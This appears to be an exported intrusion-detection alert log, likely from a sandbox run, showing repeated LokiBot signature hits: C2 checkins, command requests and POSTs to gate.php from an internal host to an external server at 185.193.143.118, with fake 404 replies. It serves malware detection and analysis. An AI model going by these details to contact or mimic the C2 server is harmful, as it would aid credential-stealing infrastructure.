                12/21/20-08:34:25.805295TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927280192.168.2.22185.193.143.118
                12/21/20-08:34:25.805295TCP2025381ET TROJAN LokiBot Checkin4927280192.168.2.22185.193.143.118
                12/21/20-08:34:25.805295TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927280192.168.2.22185.193.143.118
                12/21/20-08:34:25.805295TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927280192.168.2.22185.193.143.118
                12/21/20-08:34:25.998563TCP2025483ET TROJAN LokiBot Fake 404 Response8049272185.193.143.118192.168.2.22
                12/21/20-08:34:26.254644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927380192.168.2.22185.193.143.118
                12/21/20-08:34:26.254644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927380192.168.2.22185.193.143.118
                12/21/20-08:34:26.254644TCP2025381ET TROJAN LokiBot Checkin4927380192.168.2.22185.193.143.118
                12/21/20-08:34:26.254644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927380192.168.2.22185.193.143.118
                12/21/20-08:34:26.254644TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927380192.168.2.22185.193.143.118
                12/21/20-08:34:26.454014TCP2025483ET TROJAN LokiBot Fake 404 Response8049273185.193.143.118192.168.2.22
                12/21/20-08:34:26.704234TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927480192.168.2.22185.193.143.118
                12/21/20-08:34:26.704234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927480192.168.2.22185.193.143.118
                12/21/20-08:34:26.704234TCP2025381ET TROJAN LokiBot Checkin4927480192.168.2.22185.193.143.118
                12/21/20-08:34:26.704234TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927480192.168.2.22185.193.143.118
                12/21/20-08:34:26.704234TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927480192.168.2.22185.193.143.118
                12/21/20-08:34:26.890527TCP2025483ET TROJAN LokiBot Fake 404 Response8049274185.193.143.118192.168.2.22
                12/21/20-08:34:27.150379TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927580192.168.2.22185.193.143.118
                12/21/20-08:34:27.150379TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927580192.168.2.22185.193.143.118
                12/21/20-08:34:27.150379TCP2025381ET TROJAN LokiBot Checkin4927580192.168.2.22185.193.143.118
                12/21/20-08:34:27.150379TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927580192.168.2.22185.193.143.118
                12/21/20-08:34:27.150379TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927580192.168.2.22185.193.143.118
                12/21/20-08:34:27.339108TCP2025483ET TROJAN LokiBot Fake 404 Response8049275185.193.143.118192.168.2.22
                12/21/20-08:34:27.608122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927680192.168.2.22185.193.143.118
                12/21/20-08:34:27.608122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927680192.168.2.22185.193.143.118
                12/21/20-08:34:27.608122TCP2025381ET TROJAN LokiBot Checkin4927680192.168.2.22185.193.143.118
                12/21/20-08:34:27.608122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927680192.168.2.22185.193.143.118
                12/21/20-08:34:27.608122TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927680192.168.2.22185.193.143.118
                12/21/20-08:34:27.797706TCP2025483ET TROJAN LokiBot Fake 404 Response8049276185.193.143.118192.168.2.22
                12/21/20-08:34:28.088721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927780192.168.2.22185.193.143.118
                12/21/20-08:34:28.088721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927780192.168.2.22185.193.143.118
                12/21/20-08:34:28.088721TCP2025381ET TROJAN LokiBot Checkin4927780192.168.2.22185.193.143.118
                12/21/20-08:34:28.088721TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927780192.168.2.22185.193.143.118
                12/21/20-08:34:28.088721TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927780192.168.2.22185.193.143.118
                12/21/20-08:34:28.281017TCP2025483ET TROJAN LokiBot Fake 404 Response8049277185.193.143.118192.168.2.22
                12/21/20-08:34:28.539101TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927880192.168.2.22185.193.143.118
                12/21/20-08:34:28.539101TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927880192.168.2.22185.193.143.118
                12/21/20-08:34:28.539101TCP2025381ET TROJAN LokiBot Checkin4927880192.168.2.22185.193.143.118
                12/21/20-08:34:28.539101TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927880192.168.2.22185.193.143.118
                12/21/20-08:34:28.539101TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927880192.168.2.22185.193.143.118
                12/21/20-08:34:28.733897TCP2025483ET TROJAN LokiBot Fake 404 Response8049278185.193.143.118192.168.2.22
                12/21/20-08:34:28.979677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927980192.168.2.22185.193.143.118
                12/21/20-08:34:28.979677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927980192.168.2.22185.193.143.118
                12/21/20-08:34:28.979677TCP2025381ET TROJAN LokiBot Checkin4927980192.168.2.22185.193.143.118
                12/21/20-08:34:28.979677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927980192.168.2.22185.193.143.118
                12/21/20-08:34:28.979677TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927980192.168.2.22185.193.143.118
                12/21/20-08:34:29.168517TCP2025483ET TROJAN LokiBot Fake 404 Response8049279185.193.143.118192.168.2.22
                12/21/20-08:34:29.425876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928080192.168.2.22185.193.143.118
                12/21/20-08:34:29.425876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928080192.168.2.22185.193.143.118
                12/21/20-08:34:29.425876TCP2025381ET TROJAN LokiBot Checkin4928080192.168.2.22185.193.143.118
                12/21/20-08:34:29.425876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928080192.168.2.22185.193.143.118
                12/21/20-08:34:29.425876TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928080192.168.2.22185.193.143.118
                12/21/20-08:34:29.607997TCP2025483ET TROJAN LokiBot Fake 404 Response8049280185.193.143.118192.168.2.22
                12/21/20-08:34:29.858240TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928180192.168.2.22185.193.143.118
                12/21/20-08:34:29.858240TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928180192.168.2.22185.193.143.118
                12/21/20-08:34:29.858240TCP2025381ET TROJAN LokiBot Checkin4928180192.168.2.22185.193.143.118
                12/21/20-08:34:29.858240TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928180192.168.2.22185.193.143.118
                12/21/20-08:34:29.858240TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928180192.168.2.22185.193.143.118
                12/21/20-08:34:30.288894TCP2025483ET TROJAN LokiBot Fake 404 Response8049281185.193.143.118192.168.2.22
                12/21/20-08:34:30.558440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928280192.168.2.22185.193.143.118
                12/21/20-08:34:30.558440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928280192.168.2.22185.193.143.118
                12/21/20-08:34:30.558440TCP2025381ET TROJAN LokiBot Checkin4928280192.168.2.22185.193.143.118
                12/21/20-08:34:30.558440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928280192.168.2.22185.193.143.118
                12/21/20-08:34:30.558440TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928280192.168.2.22185.193.143.118
                12/21/20-08:34:30.894018TCP2025483ET TROJAN LokiBot Fake 404 Response8049282185.193.143.118192.168.2.22
                12/21/20-08:34:31.178417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928380192.168.2.22185.193.143.118
                12/21/20-08:34:31.178417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928380192.168.2.22185.193.143.118
                12/21/20-08:34:31.178417TCP2025381ET TROJAN LokiBot Checkin4928380192.168.2.22185.193.143.118
                12/21/20-08:34:31.178417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928380192.168.2.22185.193.143.118
                12/21/20-08:34:31.178417TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928380192.168.2.22185.193.143.118
                12/21/20-08:34:31.375860TCP2025483ET TROJAN LokiBot Fake 404 Response8049283185.193.143.118192.168.2.22
                12/21/20-08:34:31.619491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928480192.168.2.22185.193.143.118
                12/21/20-08:34:31.619491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928480192.168.2.22185.193.143.118
                12/21/20-08:34:31.619491TCP2025381ET TROJAN LokiBot Checkin4928480192.168.2.22185.193.143.118
                12/21/20-08:34:31.619491TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928480192.168.2.22185.193.143.118
                12/21/20-08:34:31.619491TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928480192.168.2.22185.193.143.118
                12/21/20-08:34:31.834973TCP2025483ET TROJAN LokiBot Fake 404 Response8049284185.193.143.118192.168.2.22
                12/21/20-08:34:32.089106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928580192.168.2.22185.193.143.118
                12/21/20-08:34:32.089106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928580192.168.2.22185.193.143.118
                12/21/20-08:34:32.089106TCP2025381ET TROJAN LokiBot Checkin4928580192.168.2.22185.193.143.118
                12/21/20-08:34:32.089106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928580192.168.2.22185.193.143.118
                12/21/20-08:34:32.089106TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928580192.168.2.22185.193.143.118
                12/21/20-08:34:32.573481TCP2025483ET TROJAN LokiBot Fake 404 Response8049285185.193.143.118192.168.2.22
                12/21/20-08:34:32.827429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928680192.168.2.22185.193.143.118
                12/21/20-08:34:32.827429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928680192.168.2.22185.193.143.118
                12/21/20-08:34:32.827429TCP2025381ET TROJAN LokiBot Checkin4928680192.168.2.22185.193.143.118
                12/21/20-08:34:32.827429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928680192.168.2.22185.193.143.118
                12/21/20-08:34:32.827429TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928680192.168.2.22185.193.143.118
                12/21/20-08:34:33.016666TCP2025483ET TROJAN LokiBot Fake 404 Response8049286185.193.143.118192.168.2.22
                12/21/20-08:34:33.287630TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928780192.168.2.22185.193.143.118
                12/21/20-08:34:33.287630TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928780192.168.2.22185.193.143.118
                12/21/20-08:34:33.287630TCP2025381ET TROJAN LokiBot Checkin4928780192.168.2.22185.193.143.118
                12/21/20-08:34:33.287630TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928780192.168.2.22185.193.143.118
                12/21/20-08:34:33.287630TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928780192.168.2.22185.193.143.118
                12/21/20-08:34:33.480140TCP2025483ET TROJAN LokiBot Fake 404 Response8049287185.193.143.118192.168.2.22
                12/21/20-08:34:33.749305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928880192.168.2.22185.193.143.118
                12/21/20-08:34:33.749305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928880192.168.2.22185.193.143.118
                12/21/20-08:34:33.749305TCP2025381ET TROJAN LokiBot Checkin4928880192.168.2.22185.193.143.118
                12/21/20-08:34:33.749305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928880192.168.2.22185.193.143.118
                12/21/20-08:34:33.749305TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928880192.168.2.22185.193.143.118
                12/21/20-08:34:33.942081TCP2025483ET TROJAN LokiBot Fake 404 Response8049288185.193.143.118192.168.2.22
                12/21/20-08:34:34.328590TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928980192.168.2.22185.193.143.118
                12/21/20-08:34:34.328590TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928980192.168.2.22185.193.143.118
                12/21/20-08:34:34.328590TCP2025381ET TROJAN LokiBot Checkin4928980192.168.2.22185.193.143.118
                12/21/20-08:34:34.328590TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928980192.168.2.22185.193.143.118
                12/21/20-08:34:34.328590TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4928980192.168.2.22185.193.143.118
                12/21/20-08:34:34.518873TCP2025483ET TROJAN LokiBot Fake 404 Response8049289185.193.143.118192.168.2.22
                12/21/20-08:34:35.213001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929080192.168.2.22185.193.143.118
                12/21/20-08:34:35.213001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929080192.168.2.22185.193.143.118
                12/21/20-08:34:35.213001TCP2025381ET TROJAN LokiBot Checkin4929080192.168.2.22185.193.143.118
                12/21/20-08:34:35.213001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929080192.168.2.22185.193.143.118
                12/21/20-08:34:35.213001TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929080192.168.2.22185.193.143.118
                12/21/20-08:34:35.405753TCP2025483ET TROJAN LokiBot Fake 404 Response8049290185.193.143.118192.168.2.22
                12/21/20-08:34:35.946670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929180192.168.2.22185.193.143.118
                12/21/20-08:34:35.946670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929180192.168.2.22185.193.143.118
                12/21/20-08:34:35.946670TCP2025381ET TROJAN LokiBot Checkin4929180192.168.2.22185.193.143.118
                12/21/20-08:34:35.946670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929180192.168.2.22185.193.143.118
                12/21/20-08:34:35.946670TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929180192.168.2.22185.193.143.118
                12/21/20-08:34:36.130556TCP2025483ET TROJAN LokiBot Fake 404 Response8049291185.193.143.118192.168.2.22
                12/21/20-08:34:36.385445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929280192.168.2.22185.193.143.118
                12/21/20-08:34:36.385445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929280192.168.2.22185.193.143.118
                12/21/20-08:34:36.385445TCP2025381ET TROJAN LokiBot Checkin4929280192.168.2.22185.193.143.118
                12/21/20-08:34:36.385445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929280192.168.2.22185.193.143.118
                12/21/20-08:34:36.385445TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929280192.168.2.22185.193.143.118
                12/21/20-08:34:36.570178TCP2025483ET TROJAN LokiBot Fake 404 Response8049292185.193.143.118192.168.2.22
                12/21/20-08:34:36.835883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929380192.168.2.22185.193.143.118
                12/21/20-08:34:36.835883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929380192.168.2.22185.193.143.118
                12/21/20-08:34:36.835883TCP2025381ET TROJAN LokiBot Checkin4929380192.168.2.22185.193.143.118
                12/21/20-08:34:36.835883TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929380192.168.2.22185.193.143.118
                12/21/20-08:34:36.835883TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929380192.168.2.22185.193.143.118
                12/21/20-08:34:37.022112TCP2025483ET TROJAN LokiBot Fake 404 Response8049293185.193.143.118192.168.2.22
                12/21/20-08:34:37.281356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929480192.168.2.22185.193.143.118
                12/21/20-08:34:37.281356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929480192.168.2.22185.193.143.118
                12/21/20-08:34:37.281356TCP2025381ET TROJAN LokiBot Checkin4929480192.168.2.22185.193.143.118
                12/21/20-08:34:37.281356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929480192.168.2.22185.193.143.118
                12/21/20-08:34:37.281356TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929480192.168.2.22185.193.143.118
                12/21/20-08:34:37.475840TCP2025483ET TROJAN LokiBot Fake 404 Response8049294185.193.143.118192.168.2.22
                12/21/20-08:34:37.759174TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929580192.168.2.22185.193.143.118
                12/21/20-08:34:37.759174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929580192.168.2.22185.193.143.118
                12/21/20-08:34:37.759174TCP2025381ET TROJAN LokiBot Checkin4929580192.168.2.22185.193.143.118
                12/21/20-08:34:37.759174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929580192.168.2.22185.193.143.118
                12/21/20-08:34:37.759174TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929580192.168.2.22185.193.143.118
                12/21/20-08:34:37.948973TCP2025483ET TROJAN LokiBot Fake 404 Response8049295185.193.143.118192.168.2.22
                12/21/20-08:34:38.210194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929680192.168.2.22185.193.143.118
                12/21/20-08:34:38.210194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929680192.168.2.22185.193.143.118
                12/21/20-08:34:38.210194TCP2025381ET TROJAN LokiBot Checkin4929680192.168.2.22185.193.143.118
                12/21/20-08:34:38.210194TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929680192.168.2.22185.193.143.118
                12/21/20-08:34:38.210194TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929680192.168.2.22185.193.143.118
                12/21/20-08:34:38.398350TCP2025483ET TROJAN LokiBot Fake 404 Response8049296185.193.143.118192.168.2.22
                12/21/20-08:34:38.671751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929780192.168.2.22185.193.143.118
                12/21/20-08:34:38.671751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929780192.168.2.22185.193.143.118
                12/21/20-08:34:38.671751TCP2025381ET TROJAN LokiBot Checkin4929780192.168.2.22185.193.143.118
                12/21/20-08:34:38.671751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929780192.168.2.22185.193.143.118
                12/21/20-08:34:38.671751TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929780192.168.2.22185.193.143.118
                12/21/20-08:34:38.856241TCP2025483ET TROJAN LokiBot Fake 404 Response8049297185.193.143.118192.168.2.22
                12/21/20-08:34:39.105133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929880192.168.2.22185.193.143.118
                12/21/20-08:34:39.105133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929880192.168.2.22185.193.143.118
                12/21/20-08:34:39.105133TCP2025381ET TROJAN LokiBot Checkin4929880192.168.2.22185.193.143.118
                12/21/20-08:34:39.105133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929880192.168.2.22185.193.143.118
                12/21/20-08:34:39.105133TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929880192.168.2.22185.193.143.118
                12/21/20-08:34:39.286987TCP2025483ET TROJAN LokiBot Fake 404 Response8049298185.193.143.118192.168.2.22
                12/21/20-08:34:39.556085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929980192.168.2.22185.193.143.118
                12/21/20-08:34:39.556085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929980192.168.2.22185.193.143.118
                12/21/20-08:34:39.556085TCP2025381ET TROJAN LokiBot Checkin4929980192.168.2.22185.193.143.118
                12/21/20-08:34:39.556085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929980192.168.2.22185.193.143.118
                12/21/20-08:34:39.556085TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4929980192.168.2.22185.193.143.118
                12/21/20-08:34:39.755602TCP2025483ET TROJAN LokiBot Fake 404 Response8049299185.193.143.118192.168.2.22
                12/21/20-08:34:40.016911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930080192.168.2.22185.193.143.118
                12/21/20-08:34:40.016911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930080192.168.2.22185.193.143.118
                12/21/20-08:34:40.016911TCP2025381ET TROJAN LokiBot Checkin4930080192.168.2.22185.193.143.118
                12/21/20-08:34:40.016911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930080192.168.2.22185.193.143.118
                12/21/20-08:34:40.016911TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930080192.168.2.22185.193.143.118
                12/21/20-08:34:40.205010TCP2025483ET TROJAN LokiBot Fake 404 Response8049300185.193.143.118192.168.2.22
                12/21/20-08:34:40.489842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930180192.168.2.22185.193.143.118
                12/21/20-08:34:40.489842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930180192.168.2.22185.193.143.118
                12/21/20-08:34:40.489842TCP2025381ET TROJAN LokiBot Checkin4930180192.168.2.22185.193.143.118
                12/21/20-08:34:40.489842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930180192.168.2.22185.193.143.118
                12/21/20-08:34:40.489842TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930180192.168.2.22185.193.143.118
                12/21/20-08:34:40.690090TCP2025483ET TROJAN LokiBot Fake 404 Response8049301185.193.143.118192.168.2.22
                12/21/20-08:34:40.965176TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930280192.168.2.22185.193.143.118
                12/21/20-08:34:40.965176TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930280192.168.2.22185.193.143.118
                12/21/20-08:34:40.965176TCP2025381ET TROJAN LokiBot Checkin4930280192.168.2.22185.193.143.118
                12/21/20-08:34:40.965176TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930280192.168.2.22185.193.143.118
                12/21/20-08:34:40.965176TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930280192.168.2.22185.193.143.118
                12/21/20-08:34:41.148495TCP2025483ET TROJAN LokiBot Fake 404 Response8049302185.193.143.118192.168.2.22
                12/21/20-08:34:41.423697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930380192.168.2.22185.193.143.118
                12/21/20-08:34:41.423697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930380192.168.2.22185.193.143.118
                12/21/20-08:34:41.423697TCP2025381ET TROJAN LokiBot Checkin4930380192.168.2.22185.193.143.118
                12/21/20-08:34:41.423697TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930380192.168.2.22185.193.143.118
                12/21/20-08:34:41.423697TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930380192.168.2.22185.193.143.118
                12/21/20-08:34:41.618470TCP2025483ET TROJAN LokiBot Fake 404 Response8049303185.193.143.118192.168.2.22
                12/21/20-08:34:41.877857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930480192.168.2.22185.193.143.118
                12/21/20-08:34:41.877857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930480192.168.2.22185.193.143.118
                12/21/20-08:34:41.877857TCP2025381ET TROJAN LokiBot Checkin4930480192.168.2.22185.193.143.118
                12/21/20-08:34:41.877857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930480192.168.2.22185.193.143.118
                12/21/20-08:34:41.877857TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930480192.168.2.22185.193.143.118
                12/21/20-08:34:42.063981TCP2025483ET TROJAN LokiBot Fake 404 Response8049304185.193.143.118192.168.2.22
                12/21/20-08:34:42.325852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930580192.168.2.22185.193.143.118
                12/21/20-08:34:42.325852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930580192.168.2.22185.193.143.118
                12/21/20-08:34:42.325852TCP2025381ET TROJAN LokiBot Checkin4930580192.168.2.22185.193.143.118
                12/21/20-08:34:42.325852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930580192.168.2.22185.193.143.118
                12/21/20-08:34:42.325852TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930580192.168.2.22185.193.143.118
                12/21/20-08:34:42.520302TCP2025483ET TROJAN LokiBot Fake 404 Response8049305185.193.143.118192.168.2.22
                12/21/20-08:34:42.778146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930680192.168.2.22185.193.143.118
                12/21/20-08:34:42.778146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930680192.168.2.22185.193.143.118
                12/21/20-08:34:42.778146TCP2025381ET TROJAN LokiBot Checkin4930680192.168.2.22185.193.143.118
                12/21/20-08:34:42.778146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930680192.168.2.22185.193.143.118
                12/21/20-08:34:42.778146TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930680192.168.2.22185.193.143.118
                12/21/20-08:34:42.961060TCP2025483ET TROJAN LokiBot Fake 404 Response8049306185.193.143.118192.168.2.22
                12/21/20-08:34:43.216171TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930780192.168.2.22185.193.143.118
                12/21/20-08:34:43.216171TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930780192.168.2.22185.193.143.118
                12/21/20-08:34:43.216171TCP2025381ET TROJAN LokiBot Checkin4930780192.168.2.22185.193.143.118
                12/21/20-08:34:43.216171TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930780192.168.2.22185.193.143.118
                12/21/20-08:34:43.216171TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930780192.168.2.22185.193.143.118
                12/21/20-08:34:43.400025TCP2025483ET TROJAN LokiBot Fake 404 Response8049307185.193.143.118192.168.2.22
                12/21/20-08:34:43.656410TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930880192.168.2.22185.193.143.118
                12/21/20-08:34:43.656410TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930880192.168.2.22185.193.143.118
                12/21/20-08:34:43.656410TCP2025381ET TROJAN LokiBot Checkin4930880192.168.2.22185.193.143.118
                12/21/20-08:34:43.656410TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930880192.168.2.22185.193.143.118
                12/21/20-08:34:43.656410TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930880192.168.2.22185.193.143.118
                12/21/20-08:34:43.853422TCP2025483ET TROJAN LokiBot Fake 404 Response8049308185.193.143.118192.168.2.22
                12/21/20-08:34:44.106562TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930980192.168.2.22185.193.143.118
                12/21/20-08:34:44.106562TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930980192.168.2.22185.193.143.118
                12/21/20-08:34:44.106562TCP2025381ET TROJAN LokiBot Checkin4930980192.168.2.22185.193.143.118
                12/21/20-08:34:44.106562TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930980192.168.2.22185.193.143.118
                12/21/20-08:34:44.106562TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4930980192.168.2.22185.193.143.118
                12/21/20-08:34:44.292245TCP2025483ET TROJAN LokiBot Fake 404 Response8049309185.193.143.118192.168.2.22
                12/21/20-08:34:44.544426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931080192.168.2.22185.193.143.118
                12/21/20-08:34:44.544426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931080192.168.2.22185.193.143.118
                12/21/20-08:34:44.544426TCP2025381ET TROJAN LokiBot Checkin4931080192.168.2.22185.193.143.118
                12/21/20-08:34:44.544426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931080192.168.2.22185.193.143.118
                12/21/20-08:34:44.544426TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931080192.168.2.22185.193.143.118
                12/21/20-08:34:44.748707TCP2025483ET TROJAN LokiBot Fake 404 Response8049310185.193.143.118192.168.2.22
                12/21/20-08:34:45.030307TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931180192.168.2.22185.193.143.118
                12/21/20-08:34:45.030307TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931180192.168.2.22185.193.143.118
                12/21/20-08:34:45.030307TCP2025381ET TROJAN LokiBot Checkin4931180192.168.2.22185.193.143.118
                12/21/20-08:34:45.030307TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931180192.168.2.22185.193.143.118
                12/21/20-08:34:45.030307TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931180192.168.2.22185.193.143.118
                12/21/20-08:34:45.235508TCP2025483ET TROJAN LokiBot Fake 404 Response8049311185.193.143.118192.168.2.22
                12/21/20-08:34:45.493159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931280192.168.2.22185.193.143.118
                12/21/20-08:34:45.493159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931280192.168.2.22185.193.143.118
